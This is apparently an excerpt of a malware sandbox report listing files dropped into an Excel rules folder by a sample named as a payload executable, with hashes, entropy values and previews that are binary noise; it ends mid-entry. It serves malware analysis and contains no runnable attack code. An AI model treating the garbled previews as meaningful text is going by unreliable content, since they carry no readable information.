                                                                                                                                                                      Preview:<?xml..._^J].r.....f$.w..{}T~Q..W...4..P..^....!.V.....3./....t[.m....a..f...gn.Nt.+..0O.%z....3Br.f..&....^'<..i2.m..X....!~...w.|..`....g.._...!..?.Z..G....A.'.^e..L.^....P.....k..7....M.L..X<....]........#.U.....G..1Z....M..V.R..v.!&..c..7.!q.....D..zh.p.0.3.a4z....J.@. .F..4u...n.H.}..A].C1L..y.\.+.N.ISx...!....I.....O.o...':....|].By.....=i..].U.v..$.......E......5...d...Oo....-[...c..C.=i).gZ'qD.....d.X.o....X..........u{..P3..R.%.6.H.../......<D.Z..g.F.N.b.ii......:i{.....%...,k..z..-.S.V.|..]....y.V..GUa...+.....l...8..\?..,.n...`....."...E..~}Pj.C...VTV.....WZ..[6.H.E'!k.g.X.jeM5..^hLWB.....j..%U.a'n.z...|v...L...<.!+.3gF.v......?.A...J.....zpg.B..4.p...p..f.L...T'w!...N.......3;@....KM.!...!.3cYw.{..V....4KV.....D....'.U.............q..Y.Y......R... .*e&.U !.-K............Z.DS...p...MvmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10924v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):891
                                                                                                                                                                      Entropy (8bit):7.7782823308238305
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:qE8r1hGvvifm7MVhUCFlz6bJUaLgHsnj75jrhd0zKgvSMasA+Pekf/IgIDVSUdNX:do3mALUqqUtsnj75cKgvS9rkf/Iu2bD
                                                                                                                                                                      MD5:56CFD402A91D2CA87894C54C9141C658
                                                                                                                                                                      SHA1:CA322EF603741E5CFA6977BF3EC0672355086307
                                                                                                                                                                      SHA-256:FD1F0C53CD63F7252DB0C3FA0522C30A53D2FE42A5750B1645D8D06C7A89EBEC
                                                                                                                                                                      SHA-512:173498FA362E8D677061EA65A4DEC6A50A459A2C9F1E2D7907D16795E1A059BDB2A2E9BFBDA9A074BD303417E318F3866A53229C03090345F4575F868E437731
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml....RD.....`.#...%.n.^.{..b.x0.A)....Y.\.. .F...}o....B:.l.-*.....w...+e.X.a.3.."h.8!1.<.M#.JAN.I.l..lk./:.s..F..........8....8..A.../...'^..4.K.%...Mo..6.k.:........#~d[E..~e.......A@.;e".*.C...}.(.<u.i)V.h|.N..".Y#...bT7..u....M.......M.........[...m.9..W.....l..A..k]..kv*l...q....R..W!6.#/.....M......jM..,&2.....m.1..?.."{....l..g...WK.(..._...-O..M....1.i.2.W..n..s:d....qf..{..~..iO......h..q......1.L....U.....v...MZX%^.y&....s...K.-o9.6r<L.d.5.},c...K.P..J..my.o2y#x.$.Z.@..V.....#...!.r...nG.>..<.F>d.(.S"...p...*=g:.U.....s[wAE.Y....D..`+.qN.M.9.e.r........=...u~fp..<s.G;..4.fc9..#..!..rt.* ]q.f.]C.X+Y7....4.....i.).....X.N..5....:j.d".!l...g......(.X5.\l....t..u#......$.0..W.?.C.+<Rq6...$IZ.y.2..[.FSV......j|..X.F..mu. ...wLzu....(6..]..-F...N.V..K....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10925v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1049
                                                                                                                                                                      Entropy (8bit):7.808882815937416
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:Yil6WQui6LNV89eJxR8qUo5vkk2JMyZhEP3XTYluEtbh2bD:Y2QmH89BEvkB6PnTY4Etb6D
                                                                                                                                                                      MD5:DFC5E099A79D8D4497A0F6C6230E9798
                                                                                                                                                                      SHA1:F145C6A52B5B08F89E73B7F2B8485227966010F8
                                                                                                                                                                      SHA-256:3E12ECEE6EDD5B129B6A9A2BC838E7D8B5B2637DE40F11F38FA44329917E3339
                                                                                                                                                                      SHA-512:97D93C2AD6B42EA92913F7C094419B1C74FDD021B8FB931E2F9E8B099B35D90D63FBA45CFDD6BC989FF4DE460A0AB3340A1C7EDE6996EBB5C0BBCBFBCAD35788
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml1.......X....I....m....1|...w\.8 xq..4p.s_..K.......#.[.C1..b...E..<.....[V.P..19.0c.....O7}0.MG".tYL..^.4.......d....$.R+.l..r../..6....UO.x....c.P..O.*......e...@0!"..N.....ai.v.AD..B?;...`R"p.......3.............u..48.j...KW+.....u.k_L...xk.-..,o.?D.....,....\......x.$..%.E<.c./..p.......S.s.h..'L..QW..(U3..,..A...........@.........;._..C/L.Ds|.U=B..ODl#.l.n.h...f$..B...HI..p...\.!<.2....P....hMW..u.D....\..&..D.$..,M.6.Z.vx.V..C.+........T.......Jd.Z.jWj..."\s.45........`,.@c.....g.\/o...A...Fdg'....`...>.....J..&1....Y5.......H.m@.......vLz;...y.!|....Q.tJ."\S........H..4..Y%jGpA.k....w.......\..'M/%...~.%...t.X.r.l./.?Z0OI...(.y,.b.....TZ...g.X.......(..p..M......k/l.(.Jv>..{.'.8._...g.....=.._^H.........x.".....J8.Hwf ..l.K../.....\...^."..P_..,j..t....m...*?..N#..5ACc.Z..U..s*.=6...F..a.36....l..1...^T.t..,..@P8E_.....b..k..>L...&..yi...:..ZL=.h+....m..!.J~/.av...O)F..2x>..+........~.G..48...\......#....mMsRxMUuXypapZbGOAfxD9pczHmW8

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10940v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):885
                                                                                                                                                                      Entropy (8bit):7.776977003092473
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:W4NJTd+/eNedYVr2ojZ/eaJAWIE0EK92bD:/NJUeIi1F/0WGWD
                                                                                                                                                                      MD5:DB1F0C3F39D722D38D2D97CBCAF842E3
                                                                                                                                                                      SHA1:3334094C0359901E7D54716934961BB3729736F3
                                                                                                                                                                      SHA-256:90B98CB75CB3A4A288ED936DA735AEF3DC0AC2C804DDCBC779A75A64FB2A4977
                                                                                                                                                                      SHA-512:ACBE668341ED2E5A794A21F45E7CC895052D8B9E416B106DEBD7A61B274E7113FED5A0FECF6DA641EB0D1DADBC94B808F81D4757B0C0735EF081240056C0217A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...s)....:C....c.6.......E....9=H...c\.b9T.....R>.<f......\&..>x..c.G...J6...XM.3.e...4.q$..5.S........@4.&....~.w..E%.J.T.........PE.......r....C...'NZ?.e...\...e'.k.*...^..U.@r94En...A...7......U..E$.R.I.gM.....#=.x7.....&...8$...)...K.)..X|P...j.J.%s.b!..L.].e.....9d....q.E...N...T .{.3....."`C.\.i..k..I.y...J....t..c.........kf.{.^#fu..<...#.V..........~...s.y.C...<......vw.._...3.....^.x.7M.......]....<].W....../..5.D...,.?&.....P...r.-.}.< .....d..2{+.M.,.\..Z}M......h.&.6.N.3...B...u"c"..4........w4.@x.o..( .r..(.e.D.~h.=2..y+....5.=u....#..!.X.f2.[.....I|-..A..^rjX2........hz....9-..3|.:.5R7s.d...0|.t$../.O.e.\......}......S..a....&I"......vH.eG>V.t.S...s.<x8..!.K)._........-.....B.[R..\.(x[c._.N..L.2.j...Bm.(.'..1Q...}....U3..X.c.........|mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10952v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8529
                                                                                                                                                                      Entropy (8bit):7.976764728599795
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:hSFHZ6qANkwurGJn0PTLzgpBfUOIELwSJHkQLxQjzc2+FEPc5SbVmuK8cJ:YFHgq2IP8pOOkSlkQNQsFEPc5spKZ
                                                                                                                                                                      MD5:6D25E78347E7AA8A80F7C622C91524B8
                                                                                                                                                                      SHA1:DC27813417195581C0EA37BB1084EAE088EE66B9
                                                                                                                                                                      SHA-256:9F505A64F11E3DB77681D914610E4198352E7F79BDEC0411E0B91EDEE9F47264
                                                                                                                                                                      SHA-512:E18D99CF40E9F81533766F52F9D4BB8C42BEDE01DACEB8E4F085FE3A1293D73CBC03C8ADA2C35D9D7820C19EC08670F40E7972DE884558D763B10904F51E090D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.=J........2.-.7...2M...%-.\.......'!......4....ZS.6..Dc`..B\.*0.&.'.ss../.Y):....Ni"$.(N.....[.P.j.oV..A.H...ih.E3[.'.$.I.8v..U.m:..{2..F\..Ai..&............P...E-.....E)....m.).O.Z....FF.U....z...S...~m...e.u..{..5<.....2.mq..<..Z.9..u.....#..T....@D..Y.AI...yU.g...c.....km.`.......\.)....%?.V.-x.)..&....Q`y?5.EHq...e....P.............$k.....8.... ..,R..^e`.'.....6.A...\-joY.pF^.,^.:..|.$.VH9F...j..d?.X.Ju.....|...0zW.....J+.x.x...S..e..8..&4..p.*...D........i....5k....[.I(.........;".&Y.......1'm..r.k....V ...H.R.;[,....F...-.h....f4.d.....f...}[.F.?S..~..G.%l....`.....o.g";....R.......#......`..FM..G0.V....h+.Q.,.k....g..e.s]...|+e.....D..j..J5..hV...<.....i..U.d|.SU=...<.}?......:......x.R'..W....Z.|..?{Qp@.,+,...3........<.. ".G8^..bSZV....+.5.....7..._A.9...[.....A|...n..#.C...6-..r.z..NzG.....|!.....;.D.;L.....#../..&.|3~.n...P?Y..^~.|T..4.K6.....Q......f.L.....!.b....h.L.c{ .....k&*......`..(.i.1.B0.D...^.s.....!.t...Y....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10955v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1242
                                                                                                                                                                      Entropy (8bit):7.821051696279687
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:TuUgQnlEOHM3FsjaxtkCIiN+ruvu05zZbAJZm9b8THI2bD:K5nOHM3a2xOCIAdvVID
                                                                                                                                                                      MD5:3A378EC8B6BAF8C98E9E0FFB81378182
                                                                                                                                                                      SHA1:00EF10157D431A8B55A6515C209529ED8B62CD98
                                                                                                                                                                      SHA-256:79648AC4167879FFE83BEBD703429BDEDC601898825E13AE4986CFA657AE0D1E
                                                                                                                                                                      SHA-512:D218549281F6692AA5565930DDBB07943B58C879936BD423429AE4A60FD168A11B02ACF4674FB62CC0D434AA1793A1AA3BD56A4DC31E5A52D3CE96DE5AC2BC26
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.9K...5.P...8#S:..0$...#..y....lU$..T.....m...+.<y.6O.).}........A.NM...2...`.3:.IB.. ..... .....w.4...'.Af7b.1...F..v..4".W.a.^V..VQ.....r...RZ1...W.b.Ye...Y..Q.7j..OR..z.....g.x....O......~d..D2d....^.....K..U.)..4;..k..@..=..."B)U......j~..@=.....3%.?...|.>.w...kRa..&.c..fY...."...'.......e.....9T..5Z`....U)e..!g..W..]..=I.9F....C..+.A..h...XQ.B.v9.8..k.._.T..j.]m.x....N.._.Wl{+b..@.B..TY.8gu.)U.{Y.......l.7.u.u.=....'.....1..{;..Er%....%S..S`....=..0.mW.+.#.7N...q{.k.....;..nV....T.m.Z._$.(Y.Ve.SdD$7..7-......z..'O..[.O....O....#.E....D..l....H.u.jn...0.p.B..a.^.5...7..Iv.L{z...!..q@G.e.....&q..8.e.XFb...G.rI..qyx.\.m[.Q.e.N.....a....a.h..`......_...u . .Ci...Wj..D.E..g.I.?.Q..'.rq.@.P`...\..K....y.).'n.........q.k..E.5&cM...y.....m.....gZ.N.gLm...?..x../n. .t.J..D>....N:!..........A'o.....{SB...1|.p-E#...*nj....K.U%.-/7.d.0>...>_..,....{.~....../..P75...".....<6.5.88.v.OLg.c...6......1..Hh...^%.0,QW..N.V..U.W..e..VN.J.+.Y

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11150v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1185
                                                                                                                                                                      Entropy (8bit):7.837128080621843
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:gjX8fsy7sCJPx1Tney5Ha1gqf+qOqLgxR8ZOwBCj465uV2bD:gesMbLEy5y+tqLgxmZOZtuuD
                                                                                                                                                                      MD5:D12F311C739D08ED6F51AFB42E0E2C73
                                                                                                                                                                      SHA1:50FA7A1211530BFEE214CB2A613DD2A0CA792897
                                                                                                                                                                      SHA-256:5A0BC85D997613B30714D1AF3640497F506D5B38CBC2FFB9886974C73199A571
                                                                                                                                                                      SHA-512:32DD09A3D8FA1A383D86B52AEBAABC13E09A7CA5BE728E8BABE335B52EC6BECBD3B817A5D13EE0DEE4C5AA86A4D43E63A1695C544915A73F3437A81AE771EEA6
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml].......F....$....B..,.m.r.*....J..]..i%Q.BbO.....r\....n0.kC%....S!g.I.q.. Z....H...l.......!Z..ew}....(.x."&Jg..<q.%......V.Y%..\"_`Yg......cvh;..v.z....k....%.0......y.e..n.......S5E...uKgg.....P.{....G.Z......UX".N.:M.mD...Q...)k.Hv..[...j..o<lq.G...R.+}I......l?.lt....+pNA.s.......].L...v.....Q..T..y....].L..;.............>5...W*.o...2K..M......}.....O..5..?..~~m..z>].U.z7.....-q.o.....3.LDCc........J.K.{*..~.o'......J..@..l..\B.........H....f.!.P.hI}.....Gl..7......h*..Y....t.........@]`.mY..w..t...t).-y-...8H/.|.Y...G.u.@.......r...h).........K...<M.r..=.W...#...X...u.D......+...|D.r.!c......L..TM...\y4.......+.../.I.......'s..[`..N..e?......y4T..uK.....|.e.v...1.*....U..u.6...\0.........&y.q..1...vU/+..a..D.z||q]z..:.......~....A.=.A......o...3...i.u.m.........#.".kZ..i.g... H.........L.i{\.T.Q...Oz.R.'...hT.\i.F.n.#._...7,i~.t....0..u.Q...kbk.........a.].......|..g.k.zz.M..S.h..5B1..IOj.$....M.../`+3G@..@

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11154v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1073
                                                                                                                                                                      Entropy (8bit):7.806547030284344
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:VhYkRMbvED8hEOUi7SLgpSUryp4kgt7PbdT+Sk2bD:jF6lhz7SEpSUNtdVD
                                                                                                                                                                      MD5:DBBC5349EB85A0FD2F321EED6984BFC6
                                                                                                                                                                      SHA1:8973E30D2EC727C617F6106B715DEFE83EBC8B84
                                                                                                                                                                      SHA-256:31AA267F7DF0A93523F0B7190CF65BACF0E33D9F8DB7BF443AB928D934866DBB
                                                                                                                                                                      SHA-512:F7CC831D4A31A2606FD53BBDF90ADCE70E589EB4C532E0E34CE34434424F178C4AD527811D9F6941F6FFF0FF2E207488D85B013D5A413886D998DC6A55969A1F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlJ0P..s..4....l.L"A"..]|......c.4.....J.H.I....=.<J.6d..t..$.#.&........H.S...e.Y.e..+..li......Ra.....>&-..{...^<.j.**.+S.t2.../..Lyz..X)..+hY+e.;..E9.G..p.<H...?.>.w.s].c../.KP.. l.....^......T.!..|n.K.w0.|_.E.J..MxO.X.3<.0.....GB.|...oR.. .sd.'x..&.SM;..A.....G]Y.b{.....].B....@.X...P....g......W&...b]#..kc........I:wZ......w<hB._......v..n{.z......}.L:.0R)..&*.Hi.|.s...(...5...Z.....h.c...E...f...F.)...{U.[.t....*..q5@].....^t....|..].,..b.........e.P.........v.|Kn'.V..).C ..{c.3.H...W....Z.b.Rq.....i..i..m......,.C....../$P|.....9MO.5F.3N-|..>s.....{W.X..[...\...t..<.f....._..9t..Id...D..,...St.:.,./.......*.._>..+.4P.^..8\.f.e.F..R......}9..L9.5\x.....g.r.....1...Jf-...B..MQ..!.dXGH..T|M^p..IB.Q.......A.4.ml-..5R......9..u......`^. ..n.HyDc`.!|..&..Z..Q...<.....^....?.Xq..M58.e...+./...X./.U......|w0Z&G....#I..".....*.x.....7..X...L\.........TGV..L.q..#..Z..G..;.V...*E7$!-.....Z.Q@.gsIx...q.C<..,....-.. .QY./....R..T.d.z).mMsRx

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11187v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3232
                                                                                                                                                                      Entropy (8bit):7.940706015533666
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:AAgD3k+Tyro7GolXaGPlcl2iYbJuM0ZhxGlpQ1Bz9nKEEz39g2aPEeW8WbyS+wGD:AAX+K+lLlIYVBghxApQfEzNg/cd8+F+f
                                                                                                                                                                      MD5:C61C49EFD96DAC36F3B1F624BF55BB81
                                                                                                                                                                      SHA1:AD8E78DFEF199D9AC6F62A8F90A9CD2299EC6CCE
                                                                                                                                                                      SHA-256:89C7B88D24F991AE3661DB192A704C9412088FA5C4A7872A7CA76639192B4612
                                                                                                                                                                      SHA-512:393484A782CB34C3B8155AEE7B0AF9F6DB4B0E9CE64A374D01AA2208A16AAEB29E764CA81A005174011E826C3DEA4239F75B046618AA79B46040F2645E0B4827
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..,(."Q..@...aM.H...w...E.......`..0:..+g.tG.$.+.zM..r.j..E^.k.a..F..Z..M...4M.@...n...sB.h..x.e.o^.Zp .$n.F]..1[4..v0...IDu..,+d.CL.(..3.........wi.<2t...>d .^mg.....n..&..!M...................`..;<...KD..J..y>..?..xJ...\....3...D..]",.?..R...O.j]...hl%.w$..R....JP....A..S."U.y,...$gc...4.3...r...dZ..Ym..5.ei..*..D...tF..........J39.!|%$.h'.*d......{..ez.vp..H.m.I..n.EN.._6....?.....E'..fo'.S..=A$....+.W.(G..'$P.A..2.:..?,o...[.|.......U.Q....&..e...QF..S5E..Qb....J..fq9.....v.&.h".n...Z.e...+..R...R.X...~+........8>.R..,..F...X.9..N.z$S....\(k...w...?.F...........cM.....D.d...../L.z*iV..ZQl).f.].....Pq..v.._..cL...D*./p..!.Kg.nA..{..K......#..<@...To\3.......1p..m..2..!.HR....i.<9W.,2.l.q.P...U.N_..f.#j.u........p.<..H^....G.N..*.S.t.rd;Uh.4...3.-.)&L...re=...bz)........!..~.L.Q'k%{F....&..h... ...6N.3d.......J....<....4a.C.gKT..q.s...9q.....8......yAh.!4....}..G!\..m.qGW...w....H.h.P#.L&...N..w.l3..J.O..`Ur.B...}l6.l

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11190v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1231
                                                                                                                                                                      Entropy (8bit):7.838421235738029
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:wu+zUSB45GEglB711gAD20DJp7CKiyzV825mdQWKOL+2bD:wuEmY9lBAAD5p7s+V87QZyD
                                                                                                                                                                      MD5:1F6507FD00ED01B9A1AF58C70542FB8E
                                                                                                                                                                      SHA1:29095BF1BA897D78C5724FC7667CBDC132AC0A45
                                                                                                                                                                      SHA-256:C267CF16B1F1E24C152F5D340754858F51E4D39732BC19F7CC7BF9E7B34045BB
                                                                                                                                                                      SHA-512:660D1F2F47A1B965F1333C6EC65F2701CEAFEA7E0D6F542050BD4D5BFF8A8DF695ECCC361A5371CEB04D13F8FC877C402A7C724CC50EB77C2FBAB93038948D87
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlM.'..Y(.v...^.R......}gT..1.....,...0..-....Z8...M. .N..QRS.uWg....'.8..$...J.D.H...].n..Cl.8....<..9Z.DI...;.e[....#.a..jz&...j.n.tJ.`..x.ob.0p...]..3..?`WHQ..G....\?...x\.F......^...e+.v.F...F........6M..N...L.bIw..h...k.C.HF.A4..;..G3..%......I.gF.d..\A...-.J.W.P98...R......u.;M....j$....Bt.V..m.9.px8._. .0O</.p.3.TQ.-Y..... w.. .D.z..kL.......eOu.t..3...e=...)..M..nT..=...r..(.l..^.a[..R..F.c..=.*..J8...mI.....z.$..6#^W....*...lK.u...#....6p.h....V............l...O.(xZQG.lFn.........h...{..+7*..L....Z..."|..Q...d.oz..p...1M..b......#..Q.L;.~].%9....c.........#f.._$kTng....~s..g.WV..WQiVgP....b0.C..%..~..X....dn1{o#.tG.\].{..!..0.o..V,..[..!.R....X-.).e.2*Zo....../d./...3...S..a..A..lX.n>'.F*......Xs.7m|.,v.N$..@..,..y...p...og.......p..I........$...Y.".._]...............oO]...gEx.9...,.....&D.....|.+./.........!.....L.0...`,..I....0..pI.J..../3p.O,....R6-...:.........].).".d...e..$2.E.7KN2wP........V.D8_.P......%,>..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11195v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):7567
                                                                                                                                                                      Entropy (8bit):7.975072249683962
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:8wqtiGsRgsW/9pz0hiL2aDIjfzL2AB62vuVdzzeTQWkEU:8wciZgt9pz2ikzL2AXezmXk
                                                                                                                                                                      MD5:2432D077D866B88E67C414265B78675D
                                                                                                                                                                      SHA1:0548EFD492724DD0F0E66388DCD0F6FF0DDDD59D
                                                                                                                                                                      SHA-256:061435AB6153CB116BF35EDC4015E37BE15671BB4420A3F095450BF6B969B76F
                                                                                                                                                                      SHA-512:11BBE7A7D234D5D21B1A7689BCFEE33C47E3780D43112AC4F04C6B0699FE7465AE4D0D394A45744D010DB34777561BB420D97626778916673BED126A06315EC0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlK.<..67......f|.r......G....... .......+.L\.H...{D.xC...G....Q.?...[%...yixln*'.W....8&......o...........`W....4.....".y.....?.).(.\m...D..._..b.Q..n}..U_.^UM..t<._...T!d4=.!...:...G#.g...E.J....}.*.M....w.....v<....7....:t.&.....+Y.....I..BlD.HO.^-.....|.]n.W.eQ..b.'0S.....NA..k/+...D..){....)2tcGs$q..5......Lx]W.........40.n.j......M...^.5q.W}A^.U....BS...N:...3.........%.._.*:;...z.a.....$y..9 v~.s.z!K...B...g#m'Dk........=........d,..".2...@;~..,....P.F.j_.vs:p.Y......df...D..p..(...}.4Q....e...Io.<B6.........Z..s..Vu.........>...{.A..?..:.&D..P.#...k.C.T%].PfVP............R...5.....G......`2n..WFP.&llU.G.0.A..e.....Q.mW{?..$..~.be. X.Gg.jP.U...`0SG.r*[Lm&...Hq...j.t..$.........(.P..m2...2dg...}..%..Q.../....z0.[#.j'.<..:.._...s.......Z.g.........]0..'...H"...ut[......U;..k....a.....!..T.{V&s[+6.^..h.1.z99..+...G9}............"...X.*.M...6.0a..q...)_..b.....Z.6OKAk~0..p.Y;...XN\...F..G.8..Z..l}.N..x....].v...".*...)..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11208v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):816
                                                                                                                                                                      Entropy (8bit):7.716189462313623
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:zpstaMEkC+qgNtNnjmsmaGIhVZ/qv+yK2bD:FUPEkH/jmsmChVZ/qv+yBD
                                                                                                                                                                      MD5:F5F4FF7FE09257EE257FEFF8D2132CD6
                                                                                                                                                                      SHA1:F1B49A31556E17CE276BF3F966BC647A541CCB63
                                                                                                                                                                      SHA-256:95951908FFFEFEBDA7BF719104F0AE3978B1BC8F24D626F27FDB1D67DBAABEAE
                                                                                                                                                                      SHA-512:0C6A284AD28A3E5795ABAD08815B598E87AEBFCF89F05B336F77C901439B985DE8B5DED7F7CEB675EEB319871A2B11DA4BF3DC682D6338F0125AE44DA2AB6B09
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..MS..v.]}#......:....XJG..j.v..%...^.....%'N..r...)..K..J..4..yV.......ct#...P.%..?.g..........L..0CSA.$..N.2k....Wt...`..R...{........kAf..}.?.._._..g....Rs.;..J.......?l.V,..;.\.\.O..........r...@.=j.?*.'........pS$.z.....".....;..6.P=........!...c9.#.I).._IlR...P.o9. ......h..[zr..-...G..]f)..J.4.Z..o...#..{... ... .b..w&q.X. .3%.}...;...+F.%....7...j.!.4"..[-.......4......5...SQ*.'.F...2*\p....@.=c...!^.e..a.6...g7o..m...8.....ph....C.,.(.....x[}s..o7uX....1-.5..W.'..9.........g...;k,.U..qs.?.L6-g4JQ...%.ha.UJ...9..h..y...r....f..M.g.Xi...vj4m.....d...'8.......qQ...bv.........D.d.>.O.j..>.k.J.5.0,..A....\A..E.X...J..s=e3..d.n/.S.mWi.*'@...H..|rQ..-7.C......m........F.K..o...Z%.W4.A. Z>....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11209v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2272
                                                                                                                                                                      Entropy (8bit):7.9172400404769565
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:xMWo2yab97/Us4O4bHc0wKmHCZHh52FpidIKNtmB56onEJvxQ/FSWBd5D:iubt/UTtH3wKHPmp2/NA6oEwFSKn
                                                                                                                                                                      MD5:8271FB1855D33D04A66B7E584C81538E
                                                                                                                                                                      SHA1:0A0AA591D4966A9E62C8992475229D263F141456
                                                                                                                                                                      SHA-256:3E59B78042607AF1DA679893F6794BBEA625D84FF8283691662C46ACDA1BE7FF
                                                                                                                                                                      SHA-512:A8F6EA270D1A4116CD91C082A3986F26A85CDB23EB3CD348A62D8CB508B6381ACB5BD6BCC722B48F6C5889FBC6E0CF6EAE26318E8890945651CF5706DC829A86
                                                                                                                                                                      Malicious:false
